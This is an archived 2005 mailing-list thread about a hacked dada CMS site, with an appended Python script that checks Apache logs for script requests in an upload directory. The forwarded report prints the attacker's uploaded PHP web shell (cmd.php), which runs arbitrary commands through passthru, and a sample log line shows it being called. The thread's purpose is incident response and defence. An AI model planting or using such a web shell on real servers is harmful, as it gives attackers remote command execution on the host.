[Imc-tech] [Fwd: dada hacked]
Arun Bhalla
bhalla at uiuc.edu
Thu Apr 28 10:51:48 CDT 2005
I think it might be okay as is. Zach has Apache set up to not serve
php or cgi requests from the usermedia/application directory. That's why
you get a Forbidden HTTP result if you try to click on that. Someone
else uploaded "icon.php" around March 8th and apparently gave up around
then.
But if (non-image) uploads have no utility for our users, let's shut it off.
Arun
"Daniel S. Lewart" writes:
> Mike, Zach, et al,
>
> If someone knows how to disable uploads, that would be a good thing.
>
> Cheers,
> Dan
>
> -------- Original Message --------
> Subject: dada hacked
> Date: Thu, 28 Apr 2005 12:04:04 -0300 (BRT)
> From: pietro <pietro at indymedia.org>
> Reply-To: dadaIMC Discussion <dadaIMC at lists.nothingness.org>
> To: dadaIMC at lists.nothingness.org
>
> hey folks,
>
> nj imc was one of the hacked dada sites. it was running .98. looking at
> the logs it seems that the attacker uploaded a .php file and used it to
> execute commands on the server.
>
> the file was called cmd.php and its contents are:
>
> <?php
> $cmd = $_GET['cmd'];
> passthru("$cmd", $return);
> ?>
>
>
> pietro.
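Added example, not part of the original thread: a log check that separates script requests under the upload directory that Apache refused (the Forbidden result Arun describes) from ones that were actually served (the case pietro reports). The /usermedia/ prefix, the extension list, the Apache common log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumptions (not from the thread): Apache common/combined log format,
# uploads served under /usermedia/, and this list of script extensions.
UPLOAD_PREFIX = "/usermedia/"
SCRIPT_EXT = (".php", ".phtml", ".php3", ".cgi", ".pl")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (ip, path, status, verdict) for script hits in the upload dir, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m["target"]).path  # drop any query string
    # Extension check is on the lower-cased path so x.PHP is not missed.
    if not path.startswith(UPLOAD_PREFIX) or not path.lower().endswith(SCRIPT_EXT):
        return None
    status = int(m["status"])
    if status == 403:
        verdict = "blocked"   # server refused to serve the script
    elif 200 <= status < 300:
        verdict = "served"    # script was reachable: investigate
    else:
        verdict = "other"     # e.g. 404 for a file that is not there
    return (m["ip"], path, status, verdict)

def scan(lines):
    """Classify every line and keep only the upload-directory script hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation address ranges, invented times).
SAMPLE = [
    '192.0.2.10 - - [08/Mar/2005:10:00:01 -0600] "GET /usermedia/application/icon.php HTTP/1.1" 403 289',
    '198.51.100.7 - - [28/Apr/2005:09:12:44 -0600] "GET /usermedia/application/cmd.php?cmd=id HTTP/1.1" 200 54',
    '192.0.2.10 - - [28/Apr/2005:09:13:02 -0600] "GET /usermedia/image/photo.jpg HTTP/1.1" 200 20480',
    '203.0.113.5 - - [28/Apr/2005:09:14:10 -0600] "GET /usermedia/application/x.PHP HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for ip, path, status, verdict in scan(SAMPLE):
        print(f"{verdict:8} {status} {ip:15} {path}")
```

Any "served" line means the upload directory is executing scripts and the host should be treated as compromised until shown otherwise; "blocked" lines show the Apache restriction doing its job.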